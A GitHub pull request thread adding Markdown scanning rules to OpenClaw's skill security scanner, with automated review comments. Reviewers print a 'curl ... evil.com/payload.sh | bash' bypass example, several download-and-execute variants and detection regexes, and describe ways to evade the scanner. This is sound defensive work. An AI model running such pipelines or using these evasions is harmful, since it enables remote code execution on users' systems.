Skip to content

security: scan markdown skill definitions for injection threats#43469

Open
Alex-Alaniz wants to merge 5 commits into
openclaw:mainfrom
Alex-Alaniz:security/scan-markdown-skills-v2
Open

security: scan markdown skill definitions for injection threats#43469
Alex-Alaniz wants to merge 5 commits into
openclaw:mainfrom
Alex-Alaniz:security/scan-markdown-skills-v2

Conversation

@Alex-Alaniz

@Alex-Alaniz Alex-Alaniz commented Mar 11, 2026

Copy link
Copy Markdown
Contributor

Summary

The skill scanner (src/security/skill-scanner.ts) previously only scanned JavaScript/TypeScript-style source files for threats. This PR extends it to also scan Markdown .md files, including SKILL.md definitions, for injection and obfuscation patterns.

Markdown-specific rules added:

  • hidden-unicode detects zero-width characters and text-direction overrides that can hide malicious content from visual review.
  • markdown-data-uri detects data URIs with executable MIME types such as text/html and application/javascript.
  • markdown-download-exec detects curl/wget download-and-execute pipelines, including common bypass forms like sudo bash, /bin/bash, python3, line continuations, and quoted pipe characters inside arguments.
  • markdown-encoded-payload detects large base64 blocks inside Markdown.
  • markdown-hex-payload detects hex-encoded payloads inside Markdown.

Implementation notes:

  • Added MARKDOWN_EXTENSIONS and isMarkdown().
  • Added .md to SCANNABLE_EXTENSIONS.
  • Applies Markdown-specific rules only to Markdown files, while preserving code-specific scanning behavior for code files.
  • Uses the raw Markdown source for Markdown source-wide rules so URLs like https://... are not accidentally truncated by code-comment stripping.
  • Adds focused tests for Markdown findings, Markdown/code rule separation, directory scanning, and summary counts.

Why this matters: skill definitions can include rendered Markdown. Without scanning these files, hidden instructions, obfuscated payloads, or download-and-execute commands in skill Markdown can bypass the existing code scanner.

Supersedes #10705 (auto-closed by stale bot). Rebased cleanly onto current main.

Test plan

  • pnpm test src/security/skill-scanner.test.ts
  • pnpm exec oxfmt --check --threads=1 CHANGELOG.md src/security/skill-scanner.ts src/security/skill-scanner.test.ts
  • pnpm check:changed
  • Direct scanner smoke for Markdown download-and-execute bypass forms plus benign Markdown prose and table negative cases

Real behavior proof

Behavior or issue addressed: Markdown skill definitions such as SKILL.md are now scanned for hidden Unicode, executable data URIs, download-and-execute pipelines, and encoded payloads that previously fell outside the JavaScript/TypeScript scanner surface.

Real environment tested: Local OpenClaw checkout on macOS at /Users/alexalaniz/Code/openclaw-43469, based on current openclaw/openclaw:main (24bd0b212f), with dependencies installed using pnpm@10.33.2.

Exact steps or command run after this patch: Ran the actual scanner through node node_modules/tsx/dist/cli.mjs against Markdown sources containing curl/wget bypass forms, then ran pnpm test src/security/skill-scanner.test.ts, pnpm exec oxfmt --check --threads=1 CHANGELOG.md src/security/skill-scanner.ts src/security/skill-scanner.test.ts, and pnpm check:changed.

Evidence after fix: Copied live terminal output from the local OpenClaw checkout:

markdown scanner smoke passed 7 positives and 2 negatives

Test Files  1 passed (1)
Tests  32 passed (32)
[test] passed 1 Vitest shard in 3.08s

All matched files use the correct format.

Found 0 warnings and 0 errors.
runtime-sidecar-loaders: local runtime sidecar loaders look OK.
Import cycle check: 0 runtime value cycle(s).

Observed result after fix: The actual parser-based scanner caught 7 Markdown download-and-execute bypass samples in the smoke run (sudo bash, sudo -E bash, env FOO=1 bash, /bin/bash, python3, a backslash-newline before | bash, and a quoted pipe inside a curl header) and did not flag benign curl prose or | curl | bash | Markdown table cells, while the targeted scanner test file and changed-file gate completed successfully.

What was not tested: No known gaps.

@greptile-apps

greptile-apps Bot commented Mar 11, 2026

Copy link
Copy Markdown
Contributor

Greptile Summary

This PR extends the skill scanner to detect injection and obfuscation threats in markdown (.md) files — specifically SKILL.md skill definition files — by adding a parallel set of markdown-specific rules that are applied conditionally based on file extension.

Changes:

  • Introduces CODE_EXTENSIONS, MARKDOWN_EXTENSIONS, and SCANNABLE_EXTENSIONS sets; isScannable() now accepts .md files, and a new isMarkdown() helper drives rule-set selection in scanSource()
  • Adds four markdown-specific detection rules: hidden-unicode (zero-width/direction-override characters), markdown-data-uri (executable MIME-type data URIs), markdown-download-exec (curl/wget piped to a shell), and markdown-encoded-payload/markdown-hex-payload (obfuscated payloads in code fences)
  • 12 new tests cover all rules, threshold behavior, and rule-set isolation; 2 updated tests reflect the new .md acceptance in isScannable()

Issues found:

  • markdown-download-exec regex bypass: The pattern [^\n|]* stops at the first | in a line, so an attacker can evade detection by embedding a pipe character in a curl/wget argument (e.g., a header value). The real | bash suffix is never matched. A non-greedy dot-all alternative (.*? with the s flag) or a quoted-segment-aware pattern would close this gap.
  • Minor: Array.from() is unnecessary when spreading CODE_EXTENSIONS/MARKDOWN_EXTENSIONS into SCANNABLE_EXTENSIONS — sets are directly iterable.

Confidence Score: 3/5

  • PR is safe to merge with the caveat that the markdown-download-exec rule has a known bypass that limits its detection coverage
  • The implementation is well-structured and the new markdown scanning capability is a clear security improvement. However, the markdown-download-exec regex contains a real logic flaw — embedding a pipe character in a curl/wget argument (e.g., a header value) prevents the pattern from ever matching the intended | shell suffix, making the rule trivially bypassable by a motivated attacker. This is the primary driver for the reduced score. The rest of the rules and the test suite are solid.
  • src/security/skill-scanner.ts — specifically the markdown-download-exec regex pattern on line 242

Last reviewed commit: 15bb77c

Comment thread src/security/skill-scanner.ts Outdated
Comment on lines 43 to 46
const SCANNABLE_EXTENSIONS = new Set([
".js",
".ts",
".mjs",
".cjs",
".mts",
".cts",
".jsx",
".tsx",
...Array.from(CODE_EXTENSIONS),
...Array.from(MARKDOWN_EXTENSIONS),
]);

Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Unnecessary Array.from() wrapping when spreading sets

Set is directly iterable and can be spread without Array.from(). The Array.from() calls add unnecessary allocations and reduce readability.

Suggested change
const SCANNABLE_EXTENSIONS = new Set([
".js",
".ts",
".mjs",
".cjs",
".mts",
".cts",
".jsx",
".tsx",
...Array.from(CODE_EXTENSIONS),
...Array.from(MARKDOWN_EXTENSIONS),
]);
const SCANNABLE_EXTENSIONS = new Set([...CODE_EXTENSIONS, ...MARKDOWN_EXTENSIONS]);
Prompt To Fix With AI
This is a comment left during a code review.
Path: src/security/skill-scanner.ts
Line: 43-46

Comment:
**Unnecessary `Array.from()` wrapping when spreading sets**

`Set` is directly iterable and can be spread without `Array.from()`. The `Array.from()` calls add unnecessary allocations and reduce readability.

```suggestion
const SCANNABLE_EXTENSIONS = new Set([...CODE_EXTENSIONS, ...MARKDOWN_EXTENSIONS]);
```

How can I resolve this? If you propose a fix, please make it concise.

Note: If this suggestion doesn't match your team's coding style, reply to this and let me know. I'll remember it for next time!

Comment thread src/security/skill-scanner.ts Outdated
ruleId: "markdown-download-exec",
severity: "critical",
message: "Download-and-execute pattern detected in markdown content",
pattern: /(?:curl|wget)\s+[^\n|]*\|\s*(?:sh|bash|zsh|node|python|perl|ruby)\b/,

Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

markdown-download-exec bypassed by pipe in curl/wget arguments

The pattern [^\n|]* stops matching at the first | character in a line. An attacker can evade this rule by embedding a pipe character in any curl argument, such as a header value or POST body:

curl -H "X-Header: value1|value2" https://evil.com/payload.sh | bash

When the engine tries to match:

  1. (?:curl|wget) matches curl
  2. \s+ matches the space
  3. [^\n|]* matches up to the first | in the header value — stops there
  4. \| matches that embedded |
  5. \s*(?:sh|bash|...) tries to match value2"...fails

Backtracking cannot recover because [^\n|]* can never advance past the embedded pipe, so the real | bash at the end is never reached. The rule produces no finding.

A more robust alternative is to use a non-greedy dot-all match so that embedded pipes are allowed and only the final | <shell> needs to satisfy the suffix requirement:

/(?:curl|wget)\s+.*?\|\s*(?:sh|bash|zsh|node|python|perl|ruby)\b/s

Or explicitly allow quoted segments to avoid false positives:

/(?:curl|wget)\s+(?:"[^"]*"|'[^']*'|[^\n|])*\|\s*(?:sh|bash|zsh|node|python|perl|ruby)\b/
Prompt To Fix With AI
This is a comment left during a code review.
Path: src/security/skill-scanner.ts
Line: 242

Comment:
**`markdown-download-exec` bypassed by pipe in curl/wget arguments**

The pattern `[^\n|]*` stops matching at the **first** `|` character in a line. An attacker can evade this rule by embedding a pipe character in any curl argument, such as a header value or POST body:

```
curl -H "X-Header: value1|value2" https://evil.com/payload.sh | bash
```

When the engine tries to match:
1. `(?:curl|wget)` matches `curl`
2. `\s+` matches the space
3. `[^\n|]*` matches up to the first `|` in the header value — stops there
4. `\|` matches that embedded `|`
5. `\s*(?:sh|bash|...)` tries to match `value2"...`**fails**

Backtracking cannot recover because `[^\n|]*` can never advance past the embedded pipe, so the real `| bash` at the end is never reached. The rule produces no finding.

A more robust alternative is to use a non-greedy dot-all match so that embedded pipes are allowed and only the final `| <shell>` needs to satisfy the suffix requirement:

```
/(?:curl|wget)\s+.*?\|\s*(?:sh|bash|zsh|node|python|perl|ruby)\b/s
```

Or explicitly allow quoted segments to avoid false positives:
```
/(?:curl|wget)\s+(?:"[^"]*"|'[^']*'|[^\n|])*\|\s*(?:sh|bash|zsh|node|python|perl|ruby)\b/
```

How can I resolve this? If you propose a fix, please make it concise.

@chatgpt-codex-connector chatgpt-codex-connector Bot left a comment

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

💡 Codex Review

Here are some automated review suggestions for this pull request.

Reviewed commit: 15bb77c087

ℹ️ About Codex in GitHub

Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you

  • Open a pull request for review
  • Mark a draft as ready
  • Comment "@codex review".

If Codex has suggestions, it will comment; otherwise it will react with 👍.

Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".

Comment thread src/security/skill-scanner.ts Outdated
ruleId: "markdown-download-exec",
severity: "critical",
message: "Download-and-execute pattern detected in markdown content",
pattern: /(?:curl|wget)\s+[^\n|]*\|\s*(?:sh|bash|zsh|node|python|perl|ruby)\b/,

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

P1 Badge Match sudo-wrapped download-and-exec pipelines

The new markdown-download-exec rule only matches when sh|bash|... appears immediately after the pipe, so common variants like curl ... | sudo bash (or wget ... | sudo sh) are not flagged at all. Because plugin/skill install warnings and security audit --deep treat this rule as a critical signal, this creates an easy evasion path for exactly the markdown payload class this commit is meant to catch.

Useful? React with 👍 / 👎.

@Alex-Alaniz Alex-Alaniz force-pushed the security/scan-markdown-skills-v2 branch from 15bb77c to b0c8822 Compare March 19, 2026 15:42
@Alex-Alaniz Alex-Alaniz requested a review from a team as a code owner March 19, 2026 15:42

@chatgpt-codex-connector chatgpt-codex-connector Bot left a comment

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

💡 Codex Review

Here are some automated review suggestions for this pull request.

Reviewed commit: b0c8822364

ℹ️ About Codex in GitHub

Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you

  • Open a pull request for review
  • Mark a draft as ready
  • Comment "@codex review".

If Codex has suggestions, it will comment; otherwise it will react with 👍.

Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".

Comment thread src/security/skill-scanner.ts Outdated
severity: "critical",
message: "Download-and-execute pattern detected in markdown content",
pattern:
/\b(?:curl|wget)\b(?:[^\n"'|\\]|\\.|"(?:\\.|[^"\\])*"|'(?:\\.|[^'\\])*')*\|\s*(?:sh|bash|zsh|node|python|perl|ruby)\b/,

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

P1 Badge Match wrapped interpreters in download-exec markdown rule

The markdown-download-exec pattern is still too narrow after the pipe and only matches a bare command token, so equivalent execution forms like curl ... | /bin/bash, curl ... | python3, or line-wrapped continuations (curl ... \\ then | bash) do not trigger the critical finding even though they execute downloaded payloads. This creates a practical evasion path for security audit --deep on malicious markdown instructions. Fresh evidence: evaluating the exact regex at this line against these variants returns no match.

Useful? React with 👍 / 👎.

@openclaw-barnacle

Copy link
Copy Markdown

This pull request has been automatically marked as stale due to inactivity.
Please add updates or it will be closed.

@openclaw-barnacle openclaw-barnacle Bot added the stale Marked as stale due to inactivity label Apr 27, 2026
@clawsweeper

clawsweeper Bot commented Apr 27, 2026

Copy link
Copy Markdown
Contributor

Codex review: found issues before merge. Reviewed June 13, 2026, 5:05 PM ET / 21:05 UTC.

Summary
The branch adds Markdown-specific security scanner rules and tests under the old src/security/skill-scanner.* path and adds a release changelog entry.

PR surface: Source +359, Tests +206, Docs +1. Total +566 across 3 files.

Reproducibility: yes. Source inspection shows current main excludes .md from the active scanner extension set, while the PR body supplies after-fix terminal smoke output for Markdown detection.

Review metrics: 2 noteworthy metrics.

  • Markdown scanner severities: 5 added: 1 critical, 4 warn. New audit severities can affect workflows that gate plugin or skill use on scanner findings.
  • Release-owned changelog entry: 1 added. OpenClaw release generation owns CHANGELOG.md, so normal PRs should keep release-note context outside the changelog.

Merge readiness
Overall: 🧂 unranked krab
Proof: 🦞 diamond lobster
Patch quality: 🧂 unranked krab
Result: blocked by patch quality or review findings.

Overall follows the weaker of proof and patch quality, so missing proof can cap an otherwise strong patch.

Rank-up moves:

  • Port the scanner logic and tests to src/skills/security/scanner.ts.
  • Remove the CHANGELOG.md edit.
  • Refresh terminal smoke/test proof after the branch is ported.

Risk before merge

  • [P1] The PR is conflicting and edits the obsolete scanner module; a rebase must port the changes to src/skills/security/scanner.ts without dropping current scanner options such as truncation and include behavior.
  • [P1] Adding new critical/warn Markdown findings changes audit security decisions for skill/plugin content and can block existing audit-gated workflows if false positives are too broad.
  • [P1] The related broader Markdown validation and SKILL.md instruction-isolation issues remain open, so this patch should be treated as narrow scanner hardening, not the full skill trust-boundary design.

Maintainer options:

  1. Port To Active Scanner (recommended)
    Move the Markdown scanning logic and tests onto src/skills/security/scanner.ts, drop the changelog edit, and refresh proof against the rebased branch before merge.
  2. Accept The Audit Policy Change
    Maintainers may intentionally accept the new Markdown warning/critical findings after deciding the false-positive and workflow-blocking impact is appropriate.
  3. Pause For Skill Security Design
    If Markdown validation or instruction isolation should be designed first, pause this PR and use the related open issues as the design venue.

Next step before merge

  • [P2] The remaining action combines contributor porting with maintainer acceptance of the security-boundary and compatibility tradeoff, so it is not a safe automatic repair lane.

Security
Needs attention: The hardening is security-relevant, but it targets an obsolete scanner path and changes audit security decisions, so security-boundary review is still needed.

Review findings

  • [P1] Port the scanner changes to the current module — src/security/skill-scanner.ts:40-44
  • [P3] Remove the release-owned changelog entry — CHANGELOG.md:14
Review details

Best possible solution:

Port the Markdown rules and tests to src/skills/security/scanner.ts, preserve current scanner behavior, remove the changelog edit, and land only after the audit-severity policy is accepted.

Do we have a high-confidence way to reproduce the issue?

Yes. Source inspection shows current main excludes .md from the active scanner extension set, while the PR body supplies after-fix terminal smoke output for Markdown detection.

Is this the best way to solve the issue?

No as submitted. The hardening direction is useful, but the patch must be ported to the current scanner module and reviewed for audit false-positive/security-boundary impact before it is the best fix.

Full review comments:

  • [P1] Port the scanner changes to the current module — src/security/skill-scanner.ts:40-44
    Current main loads the active scanner from src/skills/security/scanner.ts, while this branch edits the removed src/security/skill-scanner.ts path and is reported as conflicting. Please port the Markdown rules and tests to the current module so the hardening actually affects install/audit scanning.
    Confidence: 0.93
  • [P3] Remove the release-owned changelog entry — CHANGELOG.md:14
    OpenClaw release generation owns CHANGELOG.md, and normal PRs should keep release-note context in the PR body or commit message instead. Please drop this entry while rebasing or porting the branch.
    Confidence: 0.88

Overall correctness: patch is incorrect
Overall confidence: 0.9

AGENTS.md: found and applied where relevant.

Codex review notes: model internal, reasoning high; reviewed against d912909230e6.

Label changes

Label justifications:

  • P2: This is bounded security hardening with meaningful review impact but no evidence of an active emergency or unusable runtime.
  • merge-risk: 🚨 compatibility: New scanner findings can change existing audit-gated skill/plugin workflows during upgrade or review.
  • merge-risk: 🚨 security-boundary: The diff changes critical and warning security decisions for Markdown skill content at the skill trust boundary.
  • rating: 🧂 unranked krab: Overall readiness is 🧂 unranked krab; proof is 🦞 diamond lobster and patch quality is 🧂 unranked krab.
  • status: ⏳ waiting on author: ClawSweeper has contributor-facing work open and is waiting for author action. Sufficient (terminal): The PR body includes copied terminal output from a real checkout showing scanner smoke coverage for Markdown bypass forms and successful focused checks, though proof should be refreshed after the required port.
  • proof: sufficient: Contributor real behavior proof is sufficient. The PR body includes copied terminal output from a real checkout showing scanner smoke coverage for Markdown bypass forms and successful focused checks, though proof should be refreshed after the required port.
Evidence reviewed

PR surface:

Source +359, Tests +206, Docs +1. Total +566 across 3 files.

View PR surface stats
Area Files Added Removed Net
Source 1 376 17 +359
Tests 1 207 1 +206
Docs 1 1 0 +1
Config 0 0 0 0
Generated 0 0 0 0
Other 0 0 0 0
Total 3 584 18 +566

Security concerns:

  • [medium] Security scanner changes target obsolete path — src/security/skill-scanner.ts:40
    The PR edits src/security/skill-scanner.ts, but current main routes code-safety audit scanning through src/skills/security/scanner.ts, so the hardening must be ported before it can safely land.
    Confidence: 0.93
  • [low] Markdown heuristics change audit security decisions — src/security/skill-scanner.ts:241
    The PR adds critical and warning findings for Markdown content, so false positives or over-broad scope could affect operator audit gates unless maintainers accept that policy tradeoff.
    Confidence: 0.8

What I checked:

Likely related people:

  • thebenignhacker: PR 9806 introduced the original skill/plugin code-safety scanner that this PR extends; the merge commit added src/security/skill-scanner.*. (role: introduced adjacent scanner; confidence: high; commits: bc88e58fcfa0; files: src/security/skill-scanner.ts, src/security/skill-scanner.test.ts)
  • grp06: Live PR metadata for PR 9806 shows this account merged the original scanner PR and posted the landing proof comment. (role: merger; confidence: medium; commits: bc88e58fcfa0; files: src/security/skill-scanner.ts, src/security/skill-scanner.test.ts)
  • Peter Steinberger: Recent history on the old scanner path includes directory-walk caching and scanner test stabilization before the current path move. (role: recent area contributor; confidence: medium; commits: 2f352306fe08, 678b01946709, 5a32a66aa8ac; files: src/security/skill-scanner.ts, src/security/skill-scanner.test.ts, src/security/audit-extra.async.ts)
  • Vincent Koc: The latest release commit history includes the current src/skills/security/scanner.* files, making this a useful routing signal for the active scanner surface. (role: recent adjacent contributor; confidence: low; commits: 8c802aa68351; files: src/skills/security/scanner.ts, src/skills/security/scanner.test.ts)
What the crustacean ranks mean
  • 🦀 challenger crab: rare, exceptional readiness with strong proof, clean implementation, and convincing validation.
  • 🦞 diamond lobster: very strong readiness with only minor maintainer review expected.
  • 🐚 platinum hermit: good normal PR, likely mergeable with ordinary maintainer review.
  • 🦐 gold shrimp: useful signal, but proof or patch confidence is still limited.
  • 🦪 silver shellfish: thin signal; proof, validation, or implementation needs work.
  • 🧂 unranked krab: not merge-ready because proof is missing/unusable or there are serious correctness or safety concerns.
  • 🌊 off-meta tidepool: rating does not apply to this item.

Shiny media proof means a screenshot, video, or linked artifact directly shows the changed behavior. Runtime, network, CSP, and security claims still need visible diagnostics.

How this review workflow works
  • ClawSweeper keeps one durable marker-backed review comment per issue or PR.
  • Re-runs edit this comment so the latest verdict, findings, and automation markers stay together instead of adding duplicate bot comments.
  • A fresh review can be triggered by eligible @clawsweeper re-review comments, exact-item GitHub events, scheduled/background review runs, or manual workflow dispatch.
  • PR/issue authors and users with repository write access can comment @clawsweeper re-review or @clawsweeper re-run on an open PR or issue to request a fresh review only.
  • Maintainers can also comment @clawsweeper review to request a fresh review only.
  • Fresh-review commands do not start repair, autofix, rebase, CI repair, or automerge.
  • Maintainer-only repair and merge flows require explicit commands such as @clawsweeper autofix, @clawsweeper automerge, @clawsweeper fix ci, or @clawsweeper address review.
  • Maintainers can comment @clawsweeper explain to ask for more context, or @clawsweeper stop to stop active automation.

@openclaw-barnacle openclaw-barnacle Bot removed the stale Marked as stale due to inactivity label Apr 28, 2026
@Alex-Alaniz Alex-Alaniz force-pushed the security/scan-markdown-skills-v2 branch from b0c8822 to 6a1b9f1 Compare May 5, 2026 06:28
@openclaw-barnacle openclaw-barnacle Bot added the triage: needs-real-behavior-proof Candidate: external PR needs after-fix proof from a real setup. label May 5, 2026

@chatgpt-codex-connector chatgpt-codex-connector Bot left a comment

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

💡 Codex Review

Here are some automated review suggestions for this pull request.

Reviewed commit: 6a1b9f1392

ℹ️ About Codex in GitHub

Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you

  • Open a pull request for review
  • Mark a draft as ready
  • Comment "@codex review".

If Codex has suggestions, it will comment; otherwise it will react with 👍.

Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".


const MARKDOWN_EXTENSIONS = new Set([".md"]);

const SCANNABLE_EXTENSIONS = new Set([...CODE_EXTENSIONS, ...MARKDOWN_EXTENSIONS]);

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

P1 Badge Prioritize code files before markdown in scan file budget

Adding .md to SCANNABLE_EXTENSIONS means markdown files now consume the same maxFiles quota (DEFAULT_MAX_SCAN_FILES = 500) used by walkDirWithLimit, so a package can evade JS/TS detection by including many benign markdown files first. In that case the traversal stops before reaching malicious code files, and critical rules like dangerous-exec never run even though the payload is present; this is a practical bypass for install-time security blocking.

Useful? React with 👍 / 👎.

@openclaw-barnacle openclaw-barnacle Bot removed the triage: needs-real-behavior-proof Candidate: external PR needs after-fix proof from a real setup. label May 5, 2026
@Alex-Alaniz Alex-Alaniz force-pushed the security/scan-markdown-skills-v2 branch from 6a1b9f1 to 892f8cf Compare May 5, 2026 06:41

@chatgpt-codex-connector chatgpt-codex-connector Bot left a comment

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

💡 Codex Review

Here are some automated review suggestions for this pull request.

Reviewed commit: 892f8cf577

ℹ️ About Codex in GitHub

Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you

  • Open a pull request for review
  • Mark a draft as ready
  • Comment "@codex review".

If Codex has suggestions, it will comment; otherwise it will react with 👍.

Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".

Comment thread src/security/skill-scanner.ts Outdated
severity: "critical",
message: "Download-and-execute pattern detected in markdown content",
pattern:
/(?:curl|wget)\b[\s\S]*?\|\s*(?:(?:sudo|doas|env|\/usr\/bin\/env)\s+)*(?:\/(?:usr\/)?bin\/)?(?:sh|bash|zsh|fish|node(?:js)?|python(?:\d+(?:\.\d+)?)?|perl|ruby)(?:\d+(?:\.\d+)?)?\b/i,

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

P1 Badge Restrict markdown download-exec regex to command scope

The markdown-download-exec rule currently uses (?:curl|wget)\b[\s\S]*?\|..., which allows matching across arbitrary markdown text until any later pipe before bash/sh/python/...; this causes benign docs to be flagged as critical (for example, mentioning curl in prose and later having a markdown table row like | bash | ...). Because critical findings are used to gate security decisions, this introduces high-impact false positives and can block legitimate plugin installs/audits even when no download-and-exec command is present.

Useful? React with 👍 / 👎.

@Alex-Alaniz Alex-Alaniz force-pushed the security/scan-markdown-skills-v2 branch from 892f8cf to 4872dc9 Compare May 5, 2026 06:50
Comment thread src/security/skill-scanner.ts Fixed

@chatgpt-codex-connector chatgpt-codex-connector Bot left a comment

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

💡 Codex Review

Here are some automated review suggestions for this pull request.

Reviewed commit: 4872dc95a6

ℹ️ About Codex in GitHub

Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you

  • Open a pull request for review
  • Mark a draft as ready
  • Comment "@codex review".

If Codex has suggestions, it will comment; otherwise it will react with 👍.

Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".

Comment thread src/security/skill-scanner.ts Outdated
severity: "critical",
message: "Download-and-execute pattern detected in markdown content",
pattern:
/\b(?:curl|wget)\b(?:[^\n"'|\\]|\\[^\n]|"(?:\\.|[^"\\])*"|'(?:\\.|[^'\\])*'|\\\r?\n[ \t]*)*\|\s*(?:(?:sudo|doas|env|\/usr\/bin\/env)\s+)*(?:\/(?:usr\/)?bin\/)?(?:sh|bash|zsh|fish|node(?:js)?|python(?:\d+(?:\.\d+)?)?|perl|ruby)(?:\d+(?:\.\d+)?)?\b/i,

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

P1 Badge Match sudo/env variants in markdown download-exec rule

The markdown-download-exec regex still misses common wrapped execution forms after the pipe, so payloads like curl ... | sudo -E bash or curl ... | env FOO=1 bash produce no critical finding and can bypass install/audit blocking. Fresh evidence: evaluating the exact pattern at this line against both command forms returns false, even though they execute downloaded content the same way as already-covered | sudo bash.

Useful? React with 👍 / 👎.

Comment thread src/security/skill-scanner.ts Outdated
severity: "critical",
message: "Download-and-execute pattern detected in markdown content",
pattern:
/\b(?:curl|wget)\b(?:[^\n"'|\\]|\\[^\n]|"(?:\\.|[^"\\])*"|'(?:\\.|[^'\\])*'|\\\r?\n[ \t]*)*\|\s*(?:(?:sudo|doas|env|\/usr\/bin\/env)\s+)*(?:\/(?:usr\/)?bin\/)?(?:sh|bash|zsh|fish|node(?:js)?|python(?:\d+(?:\.\d+)?)?|perl|ruby)(?:\d+(?:\.\d+)?)?\b/i,

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

P1 Badge Exclude markdown table cells from download-exec detection

The current markdown-download-exec pattern still treats markdown table text as a shell pipeline, so benign content like | curl | bash | is flagged as a critical threat and can block legitimate installs/security audits. Fresh evidence: testing the current regex against that table row returns a match, which means command-name documentation can be misclassified as executable download-and-run behavior.

Useful? React with 👍 / 👎.

@Alex-Alaniz Alex-Alaniz force-pushed the security/scan-markdown-skills-v2 branch from 4872dc9 to f62d3f5 Compare May 5, 2026 07:09

@chatgpt-codex-connector chatgpt-codex-connector Bot left a comment

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

💡 Codex Review

Here are some automated review suggestions for this pull request.

Reviewed commit: f62d3f5ad0

ℹ️ About Codex in GitHub

Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you

  • Open a pull request for review
  • Mark a draft as ready
  • Comment "@codex review".

If Codex has suggestions, it will comment; otherwise it will react with 👍.

Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".

Comment thread src/security/skill-scanner.ts Outdated
Comment on lines +374 to +375
.replace(/^(?:[-*]\s+|\$\s*|>\s*)/, "")
.replace(/^(?:run|install|setup)\s*:\s*/i, "")

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

P1 Badge Match ordered-list command prefixes in markdown pipeline rule

markdown-download-exec can be bypassed when commands are written as numbered steps (for example, 1. curl ... | bash), because stripMarkdownCommandPrefix only removes -, *, $, blockquote, and run/install/setup: prefixes before isDownloadCommandSegment checks for a leading curl|wget. In skill docs this numbered format is common, so malicious download-and-exec instructions can avoid the critical finding and pass install/audit scanning.

Useful? React with 👍 / 👎.

@Alex-Alaniz Alex-Alaniz force-pushed the security/scan-markdown-skills-v2 branch from f62d3f5 to 10d7e25 Compare May 5, 2026 07:27

@chatgpt-codex-connector chatgpt-codex-connector Bot left a comment

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

💡 Codex Review

Here are some automated review suggestions for this pull request.

Reviewed commit: 10d7e258bd

ℹ️ About Codex in GitHub

Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you

  • Open a pull request for review
  • Mark a draft as ready
  • Comment "@codex review".

If Codex has suggestions, it will comment; otherwise it will react with 👍.

Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".

Comment thread src/security/skill-scanner.ts Outdated
Comment on lines +374 to +376
.replace(/^(?:[-*]\s+|\$\s*|>\s*)/, "")
.replace(/^(?:run|install|setup)\s*:\s*/i, "")
.trim();

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

P1 Badge Strip inline-code backticks before pipeline detection

markdown-download-exec currently misses commands wrapped in Markdown inline code (for example, Run `curl -fsSL https://x | bash` ) because stripMarkdownCommandPrefix does not remove surrounding backticks, so isDownloadCommandSegment never sees a segment starting with curl|wget. This is a practical bypass in SKILL.md-style docs where command snippets are often inline, allowing downloaded payload execution instructions to evade the critical finding used by install/audit checks.

Useful? React with 👍 / 👎.

@chatgpt-codex-connector chatgpt-codex-connector Bot left a comment

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

💡 Codex Review

Here are some automated review suggestions for this pull request.

Reviewed commit: 25bb4bfb96

ℹ️ About Codex in GitHub

Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you

  • Open a pull request for review
  • Mark a draft as ready
  • Comment "@codex review".

If Codex has suggestions, it will comment; otherwise it will react with 👍.

Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".

Comment thread src/security/skill-scanner.ts Outdated
}): { line: number; evidence: string } | null {
for (const logicalLine of logicalMarkdownLines(params.lines)) {
const trimmed = logicalLine.text.trim();
if (!trimmed || trimmed.startsWith("|") || !/\b(?:curl|wget)\b/i.test(trimmed)) {

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

P1 Badge Skip pipe-less markdown table rows in download-exec matcher

The table guard only ignores lines that start with |, but Markdown tables are also valid in the common col1 | col2 form without a leading pipe. In that case a documentation row like curl | bash is parsed as a shell pipeline and reported as a critical markdown-download-exec finding, which can incorrectly block installs/audits for benign docs. Fresh evidence: the new condition checks trimmed.startsWith("|") and therefore does not exclude pipe-less table rows.

Useful? React with 👍 / 👎.

Comment thread src/security/skill-scanner.ts Outdated
Comment on lines +470 to +471
function isDownloadCommandSegment(segment: string): boolean {
return /^(?:curl|wget)\b/i.test(stripMarkdownCommandPrefix(segment));

Copy link
Copy Markdown

Choose a reason for hiding this comment

